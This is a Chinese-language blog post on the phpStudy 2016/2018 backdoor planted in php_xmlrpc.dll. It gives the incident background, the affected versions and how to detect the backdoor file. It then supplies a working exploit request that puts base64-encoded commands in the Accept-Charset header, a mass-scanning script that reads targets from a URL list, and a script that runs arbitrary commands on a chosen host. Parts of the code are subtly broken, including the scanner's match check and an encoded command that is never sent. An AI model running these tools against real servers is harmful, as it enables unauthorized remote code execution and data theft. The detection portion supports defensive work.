PhpStudy2018后門漏洞預警及漏洞復現&檢測和執行POC腳本

phpstudy介紹

Phpstudy是國內的一款免費的PHP調試環境的程序集成包，其通過集成Apache、PHP、MySQL、phpMyAdmin、ZendOPtimizer不同版本軟件於一身，一次性安裝無需配置即可直接使用，具有PHP環境調試和PHP開發功能。由於其免費且方便的特性，在國內有着近百萬的PHP語言學習者和開發者用戶

后門事件

2018年12月4日，西湖區公安分局網警大隊接報案，某公司發現公司內有20余台計算機被執行危險命令，疑似遠程控制抓取賬號密碼等計算機數據回傳大量敏感信息。通過專業技術溯源進行分析，查明了數據回傳的信息種類、原理方法、存儲位置，並聘請了第三方鑒定機構對軟件中的“后門”進行司法鑒定，鑒定結果是該“后門”文件具有控制計算機的功能，嫌疑人已通過該后門遠程控制下載運行腳本實現收集用戶個人信息。在2019年9月20日，網上爆出phpstudy存在“后門”。作者隨后發布了聲明。
於是想起自己安裝過phpstudy軟件，趕緊查一下是否存在后門文件，結果一看真存在后門，學個PHP真是不容易，軟件被別人偷偷安裝了后門。

影響版本

目前已知受影響的phpstudy版本
phpstudy 2016版php-5.4
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45

后門檢測分析

通過分析，后門代碼存在於\ext\php_xmlrpc.dll模塊中
phpStudy2016和phpStudy2018自帶的php-5.2.17、php-5.4.45
phpStudy2016路徑
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路徑
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
用notepad打開此文件查找@eval，文件存在@eval(%s(‘%s’))證明漏洞存在，如圖：

phpstudy 2018漏洞復現

啟動phpstudy，選擇php-5.2.17版本，使用burpsuit抓包（如果是本機127.0.0.1環境，代理去掉本地過濾，否則抓不到包）。

大佬給出的exp如下

GET /index.php HTTP/1.1
Host: yourip.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3730.400 QQBrowser/10.5.3805.400
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Charset:這里就是你要執行的代碼命令（經過base64加密）
Accept-Language: zh-CN,zh;q=0.9
Connection: close

我們修改數據包查看命令phpinfo();執行情況

繼續修改數據包查看命令echo system("net user");執行情況

漏洞復現成功
ps：我復現的時候這里有一個坑，就是直接repeater過來的數據包Accept-Encoding字段的參數是gzip, deflate,deflate前面有一個空格，去掉就可以成功執行命令了

后門檢測腳本

# !/usr/bin/env python
# -*- coding:utf-8 -*-

import gevent
from gevent import monkey

gevent.monkey.patch_all()
import requests as rq


def file_read(file_name="url.txt"):
    with open(file_name, "r") as f:
        return [i.replace("\n", "") for i in f.readlines()]


def check(url):
    '''
    if "http://" or "https://" not in url:
        url = "https://" + url
    '''
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Sec-Fetch-Site': 'none',
        'accept-charset': 'ZWNobyBlZVN6eHU5Mm5JREFiOw==',  # 輸出 eeSzxu92nIDAb
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    try:
        res = rq.get(url, headers=headers, timeout=20)
        if res.status_code == 200:
            if res.text.find('eeSzxu92nIDAb'):
                print("[存在漏洞] " + url)
    except:
        print("[超時] " + url)


if __name__ == '__main__':
    print("phpStudy 批量檢測 (需要 gevent,requests 庫)")
    print("使用之前，請將URL保存為 url.txt 放置此程序同目錄下")
    input("任意按鍵開始執行..")
    tasks = [gevent.spawn(check, url) for url in file_read()]
    print("正在執行...請等候")
    gevent.joinall(tasks)
    wait = input("執行完畢 任意鍵退出...")

后門執行腳本

# !/usr/bin/env python
# -*- coding:utf-8 -*-

import requests
import base64


def backdoor(url, command="system('calc.exe');"):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Sec-Fetch-Site': 'none',
        'accept-charset': 'c3lzdGVtKCdjYWxjLmV4ZScpOw==',
        'Accept-Encoding': 'gzip,deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
    }
    command = base64.b64encode(command.encode('utf-8'))
    command = str(command, 'utf-8')
    result = requests.get(url, headers=headers, verify=False)
    if result.status_code == "200":
        print("執行完成")
    a = input("任意鍵退出...")


url = input("輸入URL(例如:http://127.0.0.1:228/xx.php)\n")
command = input("輸入命令 默認為 system('calc.exe'); (不想輸入直接回車)\n")
backdoor(url, command)

參考

PhpStudyGhost后門供應鏈攻擊事件及相關IOC
https://www.freebuf.com/column/214946.html
PHPStudy后門分析+復現&附批量Py腳本
https://mp.weixin.qq.com/s/Y29wifB6XTDcJN-RPDMwxg
phpstudy后門文件分析以及檢測腳本
https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
Phpstudy官網於2016年被入侵，犯罪分子篡改軟件並植入后門
https://mp.weixin.qq.com/s/CqHrDFcubyn_y5NTfYvkQw
phpstudy后門文件分析以及檢測腳本
https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
phpStudy隱藏后門預警
https://www.cnblogs.com/0daybug/p/11571119.html